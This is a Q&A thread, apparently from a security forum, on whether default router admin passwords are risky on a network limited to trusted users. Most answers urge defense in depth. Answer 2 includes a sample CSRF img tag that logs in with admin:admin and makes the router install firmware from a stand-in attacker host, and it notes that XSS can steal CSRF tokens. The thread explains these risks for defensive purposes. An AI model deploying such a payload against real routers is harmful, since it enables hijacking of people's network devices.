Is it dangerous to use default router admin passwords if only trusted users are allowed on the network?

Question

There are a lot of articles addressing the dangers of default router admin passwords. Certain security applications will also detect default router admin passwords as a vulnerability. However, these articles all focus on what could possibly happen if your router was compromised.

But suppose we have a router configured such that the admin panel is only open to the local network. Furthermore, suppose that the password to connect to the network (i.e. via wifi) is sufficiently secure (i.e. very high entropy), and only trusted users are allowed on the network.

Under these conditions, could the router still be compromised? Is there still a need to change the default router admin password? My thoughts are that if an attacker can't get into the network, they can't compromise the router regardless of the router's admin password. CSRF is a possibility, but that can be defended against with CSRF token. Are there any other possibilities I haven't considered?

Answer 1

As you correctly noticed CSRF attacks are a possibility. Prevention of CSRF attacks is possible with a CSRF token, but this is nothing you can do as the user of the router. So if you are a router vendor you should definitely implement CSRF protection but as a user you have to live with what the vendor offers you and many vendors don't have proper CSRF protection.

Beyond CSRF there are other attacks which can be used against the router. Similarly to CSRF, many of these use the browser as the trampoline, i.e. just require a visit to some web site which has exploits embedded (like embedded in advertisements) and don't need a compromise of the user's computer. Noticeable among these are cross site scripting (XSS) and DNS rebinding attacks. Here again the vendor could implement proper protection in theory, but in practice it is often not done.

And then even trusted users might have their system compromised through a variety of ways. In this case the attacker is inside the trusted network and knowledge of default passwords makes it a lot easier to hijack the router and make the attacker's control over the network more permanent and less obvious this way.

This means even if you think you have proper protection, you should change the password away from the default in the spirit of defense in depth. The more unknowns an attacker has to find out to infiltrate the network, the harder you make it for him, and the better you secure your network. And of course this also applies not only to the password but general router security, i.e. some routers have bugs or even backdoors where you don't even have to know the user's password for a takeover. And it's not only routers but you also have to watch out for other devices like printers, scanners, smart light bulbs, TV etc.

Answer 2

Is it dangerous to use default router admin passwords if only trusted users are allowed on the network?

Yes, it's dangerous. Here are a few more "technical" ways to do it (other than saying it's bad):

---

1. No CSRF Protection

You could be happily visiting a website, and there could be any number of issues with it:

1. The website itself was haxored and has malicious content inserted in it, or;

2. Any of the elements on the page have been MITM in the middle attacked (shut up, I'm trying to be funny) and have had elements intercepted with The Thing(tm), and;

3. CSRF attack was inserted by style, img, link, or anything else:

   Rough example:

   <img src="http://admin:admin@192.168.0.1/updateFirmware.cgi?file=hxxp://hax.com/hax.bin&confirmUpgrade=true"/>

In many cases, the CSRF protection won't help if you can log in with admin:admin@routerip through a link like that. It will create a new session and token for you instead of using your current one.

Congratulations on your newest installation of Router Backdoor(tm) with full shell access.

---

2. CSRF protection exists, but not Proper XSS Protection

Escape context and insert hax.js, or just JS code which could perform the following functions:

1. Steal CSRF token with javascript
2. See <img src=""/> above.

Also, .svg images can bypass a lot of XSS protection.

---

3. Router configuration page is accessible via the wireless network?

Someone logs in to your wireless network, visits the router configuration page and makes necessary changes/upgrades the firmware/redirects DNS/whatever they want. Like the first one, but with a point-and-click interface instead.

---

4. Other ways

• Disgruntled employees
• If anyone finds their way on your network through another compromised machine, they can use that machine to compromise your router and then you're boned.

Keep in mind, XSS/CSRF attacks could exist, or even be added during upgrades, if the vendor is crap.

So don't do it. Please. My heart can't take it. :(

Answer 3

Yes, routers have been compromised by malware executing inside the network, testing a list of default passwords. The malware enters the network through an infected phishing attachment, or a browser exploit.

If you have the ability to validate the router can't be reconfigured outside of the local network, you not only have the ability to change the default password, you have a duty to fix it.

Answer 4

I find it extraordinary that this question was asked, and I am not even a security professional. It is a bit like asking "Is it OK to leave the bank vault unlocked if only trusted cashiers are allowed in the basement?". One does not know where to start in responding. I half wonder if the question was an Ali G style windup, posted for sport.

A default password - for anything at all - is little better than a system not using a password. In one sense it is actually worse, because it fosters the illusion of password protection (which might be a ground assumption on which other parts of the system's security place reliance, in a system of checks and balances and compensating controls) whilst in reality the informed person with malice intent is now in. It becomes a sort of back door for those out there in the know. Pen testers regularly do demonstrations at IT fairs of how easy it is to look up default passwords in vendors' data sheets and on the web.

Default password problems are going to get a whole lot worse when the Internet of Things, that ultimate example of a supply without a demand, gets going. I am still reeling from seeing a projected display map of all the hackable internet kettles (yes, really) in London that were revealing their owner's computer IP and learning of the camera-equipped dolls that were turned into remote spies on their users and reprogrammed to swear expletives.

Answer 5

YES!

Thou shalt not use default username or passwords

Here is the reason why:

1. Routers are infamous for being vulnerable to backdoors. [ie, even of you did configure the administrative interfaces to be accessible only through local network, it is not unlikely to have a sneaky backdoor port which is exposed to internet.
2. Router web consoles are infamous for being vulnerable to CSRF, XSS and a bunch of other vulnerabilities. Chaining the above two, an attacker can make an unsuspecting users login with default username password and even send valid requests to alter configurations. Interestingsly, all these actions might be done in the background, while the user is playing a web game ;)
3. WiFi security doesn't entirely depend on password entropy. It depends on the algorithm used as well.
4. Zero day vulnerabilities exists and any of the 'trusted users can be avictim of those. If their accounts are compromised, you would be in trouble.
5. Last but not least;

CSRF is a possibility, but that can be defended against with CSRF token.

Tadaa.. none of the routers have fixed it yet for their interfaces. In 23rd century, probably they will.

Answer 6

Even a trusted user can have their machine hacked. Using this as a starting point, an attacker can gain full access to your routers. In other words, you would have reduced protection in the event of an attack from the inside. This is a classic example of being blindsided -- a Trojan horse.

Answer 7

This may come off as snarky, but if you are lazy enough to not change the default password because the device is in a isolated network, what's to say someone wasn't equally as lazy in setting up this secured network. Furthermore, your access through wifi defeats the idea that this network is sufficiently secure. The only way to physically isolate a network device such that the default password would be safe, would be to have nothing plugged into it (including power), encase it in concrete, and then drop it in the Marianas trench. Then you'd still have to worry about James Cameron getting access to it.

Answer 8

If whatever device you are using for a wireless AP ends up being compromised...if this network has sensitive information on it, you're going to end up having a bad time.

Is it highly unlikely that someone is going to exploit a vulnerability on your wireless router? Yes.

Is it a possibility? Yes.

If you are even remotely serious about network security you should ALWAYS change the default password on your router!

Besides decent enterprise security devices (say those that perform routine network scans, IDS, custom hosts files - all that fun stuff) there is still nothing preventing malware from getting on your network and exploiting the fact that your passwords are set to something default.

At the end of the day, your end users are going to get your network infected.

Its not a maybe, it is just a matter of time.

Say 'Jan in accounting' is 86 years old and knows jack about infosec.

She is more dangerous than ALL other threats you may face on a day to day basis.

Change your password. Change the default username.

You can implement all kinds of protective measures and still be compromised due to a default username and password. Disgruntled employee, somebodies smart and still learning script kiddie (during bring your kid to work day), all kinds of things can happen.

Why take the rise in an enterprise?

And when you change this password for the love of god don't make it something stupid. I've seen networks setup (open shares w/everyone permission...everything screaming what and where it is...that have outrageously sensitive info on them) and the password....to an outward facing router is something akin to '1234#businessname' .... I somewhat feel obligated to contact their clients and let them know that they hired an IT management company that doesn't take security seriously.

Then again I have better things to do.

Whenever they get hit with cryptolocker they'll end up facing the consequences.

Losing a $50k/yr client can really hurt a small company.

Answer 9

I am disturbed by the thinking behind "My thoughts are that if an attacker can't get into the network, they can't compromise the router...". This seems to betray a total lack of appreciation of the segregation principle in good security.

One controls a risk with relevant measures directly applicable to where it arises, rather than load all one's reliance onto the indirect effects of global or more remotely located controls elsewhere.

Ships are expected not to let water in (good perimeter security) but the diligent shipbuilder still fits bulkheads below deck, so that any water penetration that does occur in breach of all the fine design efforts elsewhere is still contained to a small area (damage limitation by compartmentalisation). The fatefully named Herald of Free Enterprise cut costs by not bothering to fit bulkheads. On 6 March 1987, through operator error it let in water via the open bow doors. It listed violently and took only 90 seconds to capsize while barely out of harbour. 193 people died in the near-freezing water.

Answer 10

You might have heard of, "Prevention is better than Cure".
Don't be this lazy, that you don't even want to change the default password for your routers. This is basic 101 class stuff. Always change the default password. Doesn't matter how secure the conditions are today. They change with time. You never know what kind of attack will be invented in future. Keep yourself up for everything.

Answer 11

As a general rule, never rely on a single point of failure. Everyone here has valid points. If someone really wants on your network, it's really just a matter of time before they have access. Whether it's a brute force attack, a DDOS attack or just some social engineering that tricks one of your authenticated users into divulging their credentials, eventually, a single point of failure will fail. Secure everything important on your network just like it was exposed to the internet directly. Also keep in mind, if you store sensitive customer information, you are responsible and liable in court if it gets leaked.

Answer 12

In principle this does not even take time to deploy. If your router model comes set up with an apparently non-random password, the manufacturer is not even trying to look secure; they should be considered untrustworthy. Manufacturers trying to sell cheap routers are notoriously not worth giving the benefit of the doubt. Now you have an untrusted router. As you say, this would be a serious risk factor.

Routers designated as having only trusted users (even excluding external ports) are not common.

Home systems host smartphones with poor security (updates), as one example.

Business systems host users who should not generally change infrastructure settings.

Networks set up as an exercise clearly shouldn't use insecure settings just because you can get away with it; the exercise is defeated. (Exception: the exercise is specifically to demonstrate insecure defaults).

Networks for testing still deserve a certain amount of care. In some cases you would expect them to match your description. However in determining this, you would be making a point of omitting standard security. Again, in principle you have no reason to be sabotaging the system like this.

Diceware is a bit annoying, but it reduces the problem to generating decent random numbers. Google a website to generate you a page of random dice rolls, and pick the rolls randomly. Tape the password to the router, and there you go.

Answer 13

I'm wondering if there is some implicit thinking behind the original Q that goes, "One risk: therefore one control to sort it". Whereas actually the relationship between risks and controls is many-many, not one-one.

You may have a car alarm. This control addresses the risk of theft of portable items from the car, and it also addresses the separate risk of the car being taken and driven away. (i): One control; more than one related risk.

You also have a lockable car door. This is a different control but it addresses the above two risks.

Each risk is addressed by more than one control (alarm and door lock).
So (ii): One risk (taking each in its turn); more than one related control.

You wouldn't cease to bother to lock your car door just because you have a car alarm. And against car theft you might have a Krooklok apparatus or steering wheel bar as well, or an ignition password or beeper, or remote GPS tracking (three, four or even five controls against one risk). Against later attempts to sell or clone the vehicle, you have the chassis number etched into the windscreen plus at least one secret place (making up to six controls against car theft or its direct consequences).

None of these controls is superfluous just because others are in place, though I think most of us would regard all six as overkill and not bother with the inconvenience of a capricious alarm or a bulky physical device that has to be unlocked if less burdensome good security is also in place.

In summary, the relationship between risks and the controls that treat them is not one-to-one, and this applies to networks and routers as much as anything else.